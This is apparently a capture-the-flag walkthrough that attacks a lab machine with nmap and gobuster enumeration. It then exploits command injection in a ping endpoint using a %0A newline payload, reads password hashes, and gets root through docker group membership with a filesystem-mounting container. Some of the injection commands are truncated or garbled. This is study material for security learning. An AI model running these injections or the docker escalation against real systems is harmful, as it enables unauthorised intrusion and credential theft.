1. Exporting the IP Address

The first command is:

export IP=10.10.82.85
  • Explanation:
    • This command sets an environment variable called IP with the value 10.10.82.85 (the IP of the target machine).
    • Why use it? It makes it easier to reference the IP in future commands without needing to type it every time. By using $IP later, you reference this stored value.

Basic Example:

If you wanted to run the command ping the IP, you could now type:

ping $IP

And this would automatically translate to:

ping 10.10.82.85

2. Nmap Enumeration

Initial Nmap Scan

We perform a basic scan to gather information about the target services:

nmap -sC -sV -v $IP -oN nmap/initial.nmap
  • Explanation:
    • nmap: This is a network scanning tool used to discover hosts and services.
    • sC: This option runs the default Nmap scripts, which are designed to detect common vulnerabilities or gather information.
    • sV: Detects service versions, helping you know the specific versions of the services running on the open ports.
    • v: Enables verbose mode, which provides more detailed output during the scan.
    • oN nmap/initial.nmap: Saves the results to a file (nmap/initial.nmap) for review later.

Why This Matters:

  • This scan helps identify the types of services running (like SSH, FTP, or HTTP) and their version numbers, which could help find vulnerabilities or misconfigurations.

Explanation of Nmap Results

From the scan, we get this output:

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
31331/tcp open  http    Apache httpd 2.4.29 (Ubuntu)
  • Port 21 (FTP):
    • Service: vsftpd (Very Secure FTP Daemon), version 3.0.3.
    • FTP is a protocol for file transfer, and in some cases, FTP can allow for anonymous access, where anyone can log in without credentials.
  • Port 22 (SSH):
    • Service: OpenSSH, a secure shell service used for remote login and command execution. Version 7.6p1 is running.
    • SSH is typically secured with usernames and passwords or key-based authentication.
  • Port 31331 (HTTP):
    • Service: Apache, a popular web server. This is where the website runs. The version is 2.4.29, which might have vulnerabilities depending on its configuration.

Next Step: Full Port Scan

Now, let’s scan all ports on the machine. This helps catch any ports that were missed in the first scan.

nmap -p- -T5 -v $IP -oN nmap/all_ports.nmap
  • Explanation:
    • p-: Scans all 65,535 ports (not just the common ones).
    • T5: This is the timing option; 5 is the fastest but might miss some results. In some cases, you’ll want to use T4 (slower, more accurate).
    • oN: Again, saving the output for future reference.

Explanation of Full Nmap Scan Results 

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
8081/tcp open  blackice-icecap
  • Port 8081:
    • This port appears to be running Node.js, a JavaScript framework. Since this wasn't picked up in the initial scan, the all-ports scan reveals more services we can investigate.

3. Investigating Specific Ports

Now, since we identified a service on port 8081, let's dig deeper to see what’s running on that port.

nmap -sV -p 8081 $IP -oN port_8081.nmap
  • Explanation:
    • sV: Attempts to detect the service version.
    • p 8081: Only scan port 8081.
    • oN: Saves the output to port_8081.nmap.

Nmap Result for Port 8081 

PORT     STATE SERVICE VERSION
8081/tcp open  http    Node.js Express framework
  • Node.js Express Framework:
    • This is a web framework often used for building APIs and web applications. If it’s not properly secured, it might be vulnerable to command injection or other attacks.

4. Gobuster Directory Brute Forcing

We know that port 31331 is running a web server (Apache). Now, we can use Gobuster to brute force directories and files.

Brute Forcing Directories on Port 31331 

gobuster dir -t 64 -u $IP:31331> -w ~/wordlists/website_dir/directory-list-2.3-medium.txt -x .php,.html,.txt -o gobuster/dir_med_31331.gobuster
  • Explanation:
    • gobuster: Tool used to brute force directories on websites.
    • dir: Directory brute forcing mode.
    • t 64: Uses 64 threads (speeding up the process).
    • u: The target URL (http://$IP:31331).
    • w: The wordlist you use to brute force (in this case, a medium-sized directory list).
    • x: Brute forces file extensions like .php, .html, .txt.
    • o: Saves the output to a file (gobuster/dir_med_31331.gobuster).

Results: 

/partners.html        (Status: 200)
/robots.txt           (Status: 200)
  • robots.txt is a file that tells search engines which directories they should avoid indexing. Sometimes, it contains useful information about hidden or important directories.

Check Robots.txt: 

curl $IP:31331/robots.txt>

This gives us:

/utech_sitemap.txt

Check Sitemap: 

curl $IP:31331/utech_sitemap.txt>

This sitemap shows the important directories on the web server:

/
/index.html
/what.html
/partners.html

Navigating to /partners.html shows a login page, and trying to log in reveals that the form sends login requests to port 8081 (/auth endpoint). This is interesting because we might be able to inject commands here.

5. Exploring Vulnerabilities

The service on port 8081 has a ping functionality. This might be vulnerable to command injection if not properly sanitized.

Test for Command Injection

First, let’s set up a tcpdump session on our own machine to capture ping requests:

tcpdump -i utun1 icmp
  • Explanation:
    • tcpdump: This is a network traffic analyzer.
    • i utun1: This specifies the network interface. You may need to adjust the interface depending on your system (use ifconfig or ip addr to find the right one).

Send a Ping Request to Your Machine 

curl "$IP:8081/ping?ip=YOUR_IP>"

If the service is vulnerable, you should see an ICMP packet captured by tcpdump on your machine.

6. Exploiting Command Injection

To exploit this, we need to inject commands into the ping request.

Injecting Commands Using URL Encoding

We know that %0A is the URL-encoded form of a newline (\\n). This lets us inject additional commands. Let’s try running an ls command:

curl ""

  • Explanation:

    • %0A: Newline, which allows us to execute a second command (ls).

    • This results in a directory listing:

      index.js
node_modules
package.json

Extracting Sensitive Data

Let’s attempt to read files from the server, such as a database:

curl "

_IP%0Acat%20"

We retrieve sensitive information, including usernames and password hashes.

7. Privilege Escalation via Docker

After logging in via SSH (using cracked credentials), we check for potential privilege escalation paths.

Check for Docker Group Membership 

id

We find the user is part of the docker group, which can be exploited to gain root access.

Exploiting Docker for Privilege Escalation

Use GTFObins to escalate privileges by running a Docker container with access to the entire filesystem:

docker run -v /:/mnt --rm -it bash chroot /mnt sh
  • Explanation:
    • v /:/mnt: Mounts the root of the filesystem (/) to /mnt in the Docker container.
    • chroot /mnt sh: Changes the root to /mnt and spawns a shell with root privileges.

Now, you have full root access to the system.